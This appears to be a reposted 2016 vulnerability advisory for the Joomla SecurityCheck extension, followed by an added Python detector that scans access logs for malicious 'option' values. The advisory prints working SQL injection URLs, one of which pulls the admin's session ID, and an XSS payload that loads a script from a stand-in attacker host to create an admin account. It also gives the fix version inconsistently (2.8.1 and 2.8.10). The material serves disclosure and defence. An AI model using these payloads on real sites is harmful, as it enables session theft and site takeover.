Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

01 Jun 2016 | Reported by Muhammet Dilmac | Type: packetstorm | Source: packetstormsecurity.com

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection Advisory by ADEO Security Team. Stored XSS and SQL Injection in SecurityCheck and SecurityCheck Pro. High severity. Fixed in v2.8.1

Code

```text
Information
------------------------------
Advisory by ADEO Security Team
Name: Stored XSS and SQL Injection in Joomla SecurityCheck extension
Affected Software : SecurityCheck and SecurityCheck Pro
Vulnerable Versions: 2.8.9 (possibly below)
Vendor Homepage : https://securitycheck.protegetuordenador.com
Vulnerabilities Type : XSS and SQL Injection
Severity : High
Status : Fixed

Technical Details
------------------------------
PoC URLs for SQL Injection

For determining the database, user and version:

http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1

For stealing the admin's session ID (if the admin is not online, the page responds with an
"attack detected" string; if online, it responds with the admin's session ID):

http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON %23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1

PoC URLs for XSS

Adds a new admin to the website silently while the admin is checking the SecurityCheck logs:

http://website/index.php?option=<script>var script = document.createElement('script');script.src = "http://ATTACKER/attack.js";document.getElementsByTagName('head')[0].appendChild(script);</script>

attack.js
https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca


Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on the SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10

Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)

Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).
```
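Both issues ride on the `option` query parameter, which in a healthy Joomla request only ever carries a component name of the form `com_xxx`. The following detector is an added example (not part of the advisory or the SecurityCheck extension) that scans Common Log Format access-log lines, pulls out `option`, and flags any value that is not a component name, labelling it by the signatures the PoCs above use; the log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (not taken from the advisory). The first
# three mimic the shape of the advisory's PoC requests; the last two are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2016:10:00:01 +0000] "GET /index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jun/2016:10:00:02 +0000] "GET /index.php?option=%27or(ExtractValue(rand(),concat(0x3a,(SELECT%20session_id%20FROM%20%23__session))))=%271 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jun/2016:10:00:03 +0000] "GET /index.php?option=%3Cscript%20src%3D%22http://ATTACKER/attack.js%22%3E%3C/script%3E HTTP/1.1" 200 512
198.51.100.7 - - [01/Jun/2016:10:00:04 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 4096
198.51.100.7 - - [01/Jun/2016:10:00:05 +0000] "GET /index.php?option=com_users&view=login HTTP/1.1" 200 2048
"""

# Common Log Format: we only need the client IP and the request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# A legitimate Joomla component name; anything else in `option` is already suspect.
VALID_OPTION = re.compile(r"^com_[A-Za-z0-9_]+$")
SQLI_SIG = re.compile(r"extractvalue\s*\(|'\s*or\s*\(|\bselect\b", re.I)
XSS_SIG = re.compile(r"<\s*script|javascript:", re.I)


def option_param(target):
    """Return the decoded `option` query parameter, or None if absent."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("option")
    if not values:
        return None
    # parse_qs decodes one layer; decode once more to catch double-encoded payloads.
    return unquote_plus(values[0])


def classify(line):
    """Classify one log line: None when benign, else a dict with ip/reason/option."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    opt = option_param(m.group("target"))
    if opt is None or VALID_OPTION.match(opt):
        return None
    if SQLI_SIG.search(opt):
        reason = "sqli"
    elif XSS_SIG.search(opt):
        reason = "xss"
    else:
        reason = "unexpected-option"
    return {"ip": m.group("ip"), "reason": reason, "option": opt}


def scan(log_text):
    # Run classify over every line and keep only the hits.
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

The allow-list on `option` is the part worth keeping even if the signatures age: a value that is not a `com_*` name has no legitimate reason to appear, whatever payload it carries.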
